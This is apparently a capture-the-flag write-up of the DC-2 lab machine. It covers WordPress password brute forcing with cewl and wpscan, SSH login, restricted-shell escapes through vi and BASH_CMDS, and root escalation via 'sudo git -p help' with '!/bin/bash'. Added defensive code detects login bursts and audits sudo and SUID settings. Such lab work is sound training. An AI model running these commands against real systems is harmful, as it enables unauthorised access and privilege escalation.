DC-2

Kali: 192.168.32.135
Target: 192.168.32.142

The scan found the IP 192.168.32.142 with only ports 80 and 7744 open. But port 80 wouldn't load: it showed a domain name, dc-2. I guessed it had to do with the hosts file, but I had never edited the hosts file on Linux, so I looked it up. Here's how:

root@kali:~# vi /etc/hosts
root@kali:~# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
192.168.32.142  dc-2

Visiting again, the site loaded: a typical WordPress site, version 4.7.10. Scrolling down the page I found flag1: your usual password dictionary may not work, so maybe you need cewl (a password-list generator that ships with Kali); the more passwords the better, but sometimes you can't win them all. Log in as one to see the next flag. If you can't find it, log in as another. So it just wants me to brute-force with a wordlist, said rather fancily.

So, following the hint, generate a password list with cewl:

root@kali:~# cewl http://dc-2 -w password.txt -d 3
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Now I need to know which accounts exist. Time to bring out Kali's wpscan, a dedicated WordPress scanner. Works a treat!

root@kali:~# wpscan --ignore-main-redirect --url 192.168.32.142 -e u --passwords password.txt --force
......
[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

Feeding the freshly generated wordlist straight into wpscan's brute force: admin didn't crack, but the other two did. Logging into the WordPress backend and looking around, under jerry's account I found flag2: if you can't exploit WordPress and take a shortcut, there is another way; hope you can find another entry point. That's a bit too cryptic. Nmap scanned for ages and still only ports 80 and 7744 were open, until the moment I noticed that 7744 was the SSH port and it clicked.
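From the defender's side, a wpscan password run like the one above leaves a very recognisable trace in the web server's access log: a burst of POSTs to wp-login.php from one client. The following is an added example, not code from the original write-up; it parses combined-log-format lines and flags clients whose failed login POSTs exceed a threshold inside a sliding window. The log lines, the client addresses and the user-agent strings are constructed for the example.

```python
"""Detect WordPress password-guessing bursts in a web server access log.

Added example (not from the original write-up). It parses combined-log-format
lines and flags any client that sends at least `threshold` failed POSTs to a
login endpoint within a sliding time window. The log lines below are
constructed to look like what a wordlist run against wp-login.php leaves.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)


def _log_line(ip, second, method, path, ua, status=200):
    # Constructed sample line in Apache/nginx "combined" format.
    return (f'{ip} - - [28/Aug/2020:11:40:{second:02d} +0800] '
            f'"{method} {path} HTTP/1.1" {status} 4512 "-" "{ua}"')


# Constructed: twelve login POSTs in twelve seconds from one client
# (a wordlist run), plus a normal visitor with a single login attempt.
SAMPLE_LOG = "\n".join(
    [_log_line("192.168.32.135", s, "POST", "/wp-login.php", "WPScan (constructed UA)")
     for s in range(12)]
    + [_log_line("192.168.32.10", 5, "GET", "/", "Mozilla/5.0 (constructed UA)"),
       _log_line("192.168.32.10", 30, "POST", "/wp-login.php", "Mozilla/5.0 (constructed UA)")]
)


def failed_login_events(log_text):
    """Map client IP -> sorted timestamps of failed login POSTs."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] not in LOGIN_PATHS:
            continue
        # A successful wp-login.php POST answers with a 302 redirect; a 200
        # means the login form was re-rendered, i.e. the attempt failed.
        if m["status"] != "200":
            continue
        events[m["ip"]].append(datetime.strptime(m["ts"], TS_FMT))
    return {ip: sorted(ts) for ip, ts in events.items()}


def detect_login_bursts(log_text, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: most failed attempts seen inside one window} for clients
    reaching `threshold`, using a sliding window over sorted timestamps."""
    hits = {}
    for ip, times in failed_login_events(log_text).items():
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits


if __name__ == "__main__":
    for ip, n in detect_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} failed login POSTs within 60s")
```

The threshold and window are tuning knobs: legitimate users mistype a password a few times, a wordlist run produces hundreds of attempts in a minute. Rate limiting or locking the login endpoint after a handful of failures, and leaving admin with a password that no site-derived wordlist contains, is what made admin survive the run above.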

Change of approach: log in over SSH

root@kali:~# ssh tom@192.168.32.142 -p 7744
tom@192.168.32.142's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$

tom's account finally got me in. Kept exploring: ls showed flag3.txt, but cat reported no permission. Very odd. After another round of hard searching I found that the situation this message hints at can be bypassed: -rbash: cat: command not found

Bypassing rbash for privilege escalation (non-root)

If bash is started under the name rbash, or with the -r option, it becomes a restricted shell (Restricted Shell). A restricted shell is generally used to build an environment that is under more control than a standard shell; the difference from a normal shell is that it restricts the execution of certain actions.

References show that this escalation method generally requires access to vi or export, and a combination of moves gets you higher privileges.

Escalation via vi

vi shell.txt
:set shell=/bin/bash
:shell

Escalation via export

export is a command that controls environment variables; it can also be used for privilege escalation

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/        or: export PATH=/usr/sbin:/usr/bin:/sbin:/bin
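To make the restricted-shell section above concrete, here is an added example (not from the original write-up, and not part of bash) that models the rules from the "Restricted Shell" section of the bash manual for a single simple command, and audits the command set an rbash user is given. It explains two things seen above: why the error reads "command not found" rather than "restricted" (rbash let cat through; the limited PATH simply had no cat), and why vi works as an escape (rbash limits what can be typed, not what a permitted program does once it runs). The SHELL_CAPABLE set and the helper names are the example's own assumptions.

```python
"""Model of what a restricted shell (rbash) does and does not stop.

Added example (not from the original write-up, not bash's own code).
`rbash_rejects` applies the bash manual's "Restricted Shell" rules to one
simple command (pipes and ';' lists are not modelled); `audit_allowed_commands`
checks an rbash user's allowed-command set for programs that can hand out an
unrestricted shell anyway.
"""
import shlex

# Variables rbash refuses to set or unset.
RESTRICTED_VARS = {"SHELL", "PATH", "ENV", "BASH_ENV"}
# Editors the write-up shows escaping rbash from the inside (:set shell /
# :shell). Assumed set; extend it for your own environment.
SHELL_CAPABLE = {"vi", "vim"}
# Output redirections rbash forbids (input redirection with '<' is allowed).
REDIRECT_TOKENS = {">", ">>", ">|", ">&", "&>", "&>>", "<>"}


def _tokens(cmdline):
    # Non-POSIX mode keeps quotes on quoted words, so a quoted '>' is a word,
    # not a redirection; punctuation_chars splits off >, >>, &> and friends.
    lex = shlex.shlex(cmdline, posix=False, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def rbash_rejects(cmdline):
    """Return the reason rbash would refuse this command, or None if rbash
    lets it through (a later 'command not found' is then just the PATH)."""
    toks = _tokens(cmdline)
    if any(t in REDIRECT_TOKENS for t in toks):
        return "redirecting output is not allowed"
    i = 0
    # Leading NAME=value assignments set the command's environment.
    while i < len(toks) and "=" in toks[i] and not toks[i].startswith("="):
        name = toks[i].split("=", 1)[0]
        if name in RESTRICTED_VARS:
            return f"setting {name} is not allowed"
        i += 1
    if i == len(toks):
        return None
    cmd, args = toks[i], toks[i + 1:]
    if cmd in {"export", "unset", "declare", "typeset", "readonly"}:
        for a in args:
            name = a.split("=", 1)[0]
            if name in RESTRICTED_VARS:
                return f"setting or unsetting {name} is not allowed"
    if "/" in cmd:
        return "command names containing a slash are not allowed"
    if cmd == "cd":
        return "cd is not allowed"
    if cmd == "exec":
        return "exec is not allowed"
    if cmd in {".", "source"} and any("/" in a for a in args):
        return "sourcing a file by path is not allowed"
    if cmd == "set" and ("+r" in args or ("+o" in args and "restricted" in args)):
        return "turning off restricted mode is not allowed"
    if cmd == "command" and "-p" in args:
        return "command -p is not allowed"
    return None


def audit_allowed_commands(names):
    """Names in an rbash user's allowed-command directory that can still
    escape: rbash limits what can be typed, not what a permitted program
    does once it is running."""
    return sorted(n for n in set(names) if n in SHELL_CAPABLE)


if __name__ == "__main__":
    for line in ("cat flag3.txt", "/bin/bash", "export PATH=/usr/bin", "vi shell.txt"):
        print(f"{line!r}: {rbash_rejects(line) or 'allowed by rbash'}")
    print("escape-capable commands:", audit_allowed_commands(["ls", "scp", "vi"]))
```

The practical consequence for anyone who deploys rbash as a control: the allowed-command directory must contain nothing that can launch another program, and the user's home and that directory must not be writable by the user, or the restriction is only cosmetic.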

This kind of escalation only gains a little more command access and can't truly escalate to root. But going by flag3's hint, "Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.", it wants me to log in as jerry. Confusing: I don't know why I couldn't log in before, but now it works... Sure enough, I was naive: not exit SSH and reconnect, but switch to the jerry account with the su command...

After switching there was another small hiccup, but thanks to my exceptional wisdom it was a breeze (a laborious one)

jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
jerry@DC-2:/home/tom$ cd ../
jerry@DC-2:/home$ ls
jerry  tom
jerry@DC-2:/home$ cd jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

It says there are no more hints and I'm on my own, while hinting at git in the same breath. Truly kind! But I still had no idea.

The following comes from the internet; even if it infringes, I'm not deleting it!

jerry@DC-2:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ sudo git -p help
......
!/bin/bash
root@DC-2:/home/jerry# ls
flag4.txt
root@DC-2:/home/jerry# cd ../
root@DC-2:/home# ls
jerry  tom
root@DC-2:/home# cd ../
root@DC-2:/# ls
bin   etc         lib         mnt   root  srv  usr
boot  home        lost+found  opt   run   sys  var
dev   initrd.img  media       proc  sbin  tmp  vmlinuz
root@DC-2:/# find / -name 'thefinalflag.txt'
root@DC-2:/# cd root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

The above touches on the following knowledge points. Tap the blackboard, key points!

1. Use find to list files with the SUID bit set
2. When sudo is present, use sudo -l to see what the current user is allowed to run
3. Privilege escalation via sudo + git
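A defender's counterpart to points 1 to 3, as an added example that is not from the original write-up: it parses the `sudo -l` output shown above, flags the two properties that made the rule exploitable (NOPASSWD, and a command that opens an interactive pager as root), and diffs a host's SUID list against a baseline. The baseline is the SUID list from the write-up; the one extra path in the "current" list, /usr/local/bin/backup-helper, is a constructed placeholder, and the function names are the example's own.

```python
"""Audit sudo rules and SUID binaries.

Added example (not from the original write-up). `parse_sudo_l` reads `sudo -l`
output (the text below is the rule shown in the write-up), `audit_sudo_rules`
flags what made that rule exploitable, and `unexpected_suid` diffs a host's
SUID list against a baseline from a reference install (the baseline here is
the write-up's list; the extra path is a constructed placeholder).
"""
import os
import re

SUDO_L_TEXT = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""

# Programs that open an interactive pager when run on a terminal; the write-up
# shows git's pager being escaped to a root shell. Assumed set; extend it.
PAGER_SPAWNERS = {"git"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return [{'runas', 'tags', 'cmd'}] for every command listed in the
    'may run the following commands' section of `sudo -l` output."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(re.findall(r"([A-Z]+):", m["tags"]))
        for cmd in m["cmds"].split(","):
            rules.append({"runas": m["runas"].strip(), "tags": tags, "cmd": cmd.strip()})
    return rules


def audit_sudo_rules(rules):
    """Return one finding string per risky property of each rule."""
    findings = []
    for r in rules:
        cmd, runas = r["cmd"], r["runas"]
        if cmd == "ALL":
            findings.append(f"{runas}: unrestricted command list (ALL)")
        if "NOPASSWD" in r["tags"]:
            findings.append(f"{cmd}: NOPASSWD, so a hijacked session runs it as "
                            f"{runas} without re-authenticating")
        if os.path.basename(cmd.split()[0]) in PAGER_SPAWNERS:
            findings.append(f"{cmd}: opens an interactive pager as {runas}; "
                            f"the pager can start a shell")
    return findings


# SUID list from the write-up, used here as the reference baseline.
BASELINE_SUID = [
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/chfn",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/procmail",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/sbin/exim4",
    "/bin/umount", "/bin/mount", "/bin/su",
]
# Constructed "current" list: the baseline plus one placeholder binary.
CURRENT_SUID = BASELINE_SUID + ["/usr/local/bin/backup-helper"]


def unexpected_suid(current, baseline):
    """SUID binaries present now but absent from the baseline."""
    return sorted(set(current) - set(baseline))


if __name__ == "__main__":
    for f in audit_sudo_rules(parse_sudo_l(SUDO_L_TEXT)):
        print("sudo:", f)
    for p in unexpected_suid(CURRENT_SUID, BASELINE_SUID):
        print("new SUID binary:", p)
```

The fix the audit points at is not a cleverer sudoers line but a narrower grant: a dedicated wrapper script that runs the one git operation jerry needs, with the pager disabled, is far easier to reason about than `/usr/bin/git` as root.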
Last modified: 28 Aug 2020, 11:53 AM